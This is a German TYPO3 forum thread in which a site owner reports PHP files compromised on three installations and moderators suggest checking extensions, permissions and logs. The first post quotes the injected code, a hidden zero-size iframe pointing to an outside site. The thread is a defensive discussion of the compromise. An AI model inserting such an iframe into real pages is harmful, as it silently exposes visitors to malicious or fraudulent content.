Ergebnis 1 bis 4 von 4

Thema: php dateien von extern verändert?!

      
  1. #1
    Forum Newbie
    Registriert seit
    11.09.2005
    Beiträge
    13

    php dateien von extern verändert?!

    Als ich heute auf meine Seite wollte auf der Typo3 v4 läuft, musste ich folgendes feststellen;

    Am Anfang kommen folgende Fehlermeldungen:

    Code:
    Warning: Cannot modify header information - headers already sent by (output started at /home/httpd/vhosts/ehc-taerbinu.ch/httpdocs/typo3conf/localconf.php:26) in /home/httpd/vhosts/ehc-taerbinu.ch/httpdocs/t3lib/class.t3lib_userauth.php on line 266
    Warning: Cannot modify header information - headers already sent by (output started at /home/httpd/vhosts/ehc-taerbinu.ch/httpdocs/typo3conf/localconf.php:26) in /home/httpd/vhosts/ehc-taerbinu.ch/httpdocs/typo3/sysext/cms/tslib/class.tslib_fe.php on line 2767
    Danach habe ich nachgeforscht und bin schlussendlich dem Problem auf die Spur gekommen: irgendwie war es jemandem möglich einige php Dateien der Typo3 installation von aussen zu ändern - wie genau weiss ich noch nicht, aber hoffentlich werd ich's durch den Provider erfahren.

    Jedenfalls war bei vielen php Dateien der folgende String ganz am Schluss angehängt worden;
    Code:
    <html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=manph marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
    Ich weiss das viele der betroffenen Dateien zu viele Lese-/Schreibrechte hatten - sprich z.B. localconf.php alles hatte was man geben kann...das muss ich noch alles korrigieren.


    Sollte es aber trotzdem nicht möglich sein die php Dateien einfach so von aussen ohne mir nichts dir nichts zu verändern???

    Hat jemand von euch auch schon so ein Problem gehabt das auf einmal einige php Dateien verändert wurden???


    Komischerweise habe ich 3 unabhängige Typo3 v4 Installationen (...alle beim selben Provider) und bei allen drei wurden die phps verändert. :(

  2. #2
    TYPO3 Forum Team Administrator Avatar von Junior
    Registriert seit
    18.08.2004
    Ort
    München
    Alter
    37
    Beiträge
    2.922
    Mir selbst ist das noch nicht untergekommen. Ich habe aber gehört, dass es bei einigen CMS zu diesem Problem kam.

    Ganz lieben Gruss

    Junior
    Two hours of trial and error can save ten minutes of manual reading.

    Meine neue Seite www.monot.com. Jetzt noch weicher.

  3. #3
    TYPO3 Forum Team Moderator Avatar von maxhb
    Registriert seit
    19.08.2004
    Ort
    Bremen
    Beiträge
    1.810
    Zitat Zitat von punchy
    Hat jemand von euch auch schon so ein Problem gehabt das auf einmal einige php Dateien verändert wurden???
    Hatte mal ein ähnliches Problem, allerdings nicht mit TYPO3, sondern mit dem phpBB. Generell ist der TYPO3-Kern als relativ sicher anzusehen, im Gegensatz zu einigen Extensions. Welche Extensions verwendest Du in welcher Version? Welche TYPO3-Version?

    Zitat Zitat von punchy
    Sollte es aber trotzdem nicht möglich sein die php Dateien einfach so von aussen ohne mir nichts dir nichts zu verändern???
    So "mir nichts dir nichts" geht so etwas auch nicht. Dennoch kann duch problematische Extensions oder falsche / unglückliche Servereinstellungen ein Angreifer in die Lage versetzt werden Deine Dateien zu ändern.

    Spannend wäre es zu sehen, ob andere Accounts auf dem selben Server (evtl. von anderen Kunden) ebenfalls gehackt wurden. Bei shared Webservern wird meist der komplette Server auf einmal kompromittiert. Schon mal Deinen provider darüber informiert? Evtl. kann der nachvollziehen, wie der Angriff abgelaufen ist.

    CU
    maxhb
    FreeBSD/Debian || MySQL 5.x || PHP.5.3 || TYPO3 3.6 - 4.5

    Meine Stadt, meine Firma, mein Redaktionssystem.

  4. #4
    TYPO3 Forum Team Moderator Avatar von mstuebner
    Registriert seit
    01.09.2004
    Ort
    84424 Isen b. Dorfen
    Alter
    45
    Beiträge
    2.496
    Zitat Zitat von punchy
    [b]Sollte es aber trotzdem nicht möglich sein die php Dateien einfach so von aussen ohne mir nichts dir nichts zu verändern???
    Eben dafür gibt die Zugriffrechte! Es gibt keinen Grund, warum irgendjemand auf den gewöhnlichen Dateien (also nicht temp*) Schreibrechte haben sollte. Damit kann das dann nicht mehr passieren.

    Dass jemand über den T3-Core einsteigt halte ich auch für unwahrscheinlich. Aber dazu gibt es ja Logfiles.

 

 

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Facebook Kommentare

Ähnliche Themen

  1. price extern verarbeiten und auslesen
    Von siva-creative im Forum tt_products
    Antworten: 0
    Letzter Beitrag: 29.04.2008, 16:12
  2. Calendar Base verändert Datum (1970)
    Von whitewing im Forum Kalender
    Antworten: 1
    Letzter Beitrag: 14.02.2008, 18:09
  3. Verlinken von extern auf Typo3 Inhalt ohne Navigation,Menu,etc
    Von zwiebug im Forum TYPO3 4.x Fragen und Probleme
    Antworten: 4
    Letzter Beitrag: 08.10.2007, 13:51
  4. navi extern auslesen
    Von blueX im Forum TYPO3 4.x Fragen und Probleme
    Antworten: 1
    Letzter Beitrag: 12.09.2007, 07:54
  5. realurl - nichts hat sich verändert
    Von ohrobot im Forum Suchmaschinenfreundliche URLs (SEO)
    Antworten: 9
    Letzter Beitrag: 06.10.2006, 10:30

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74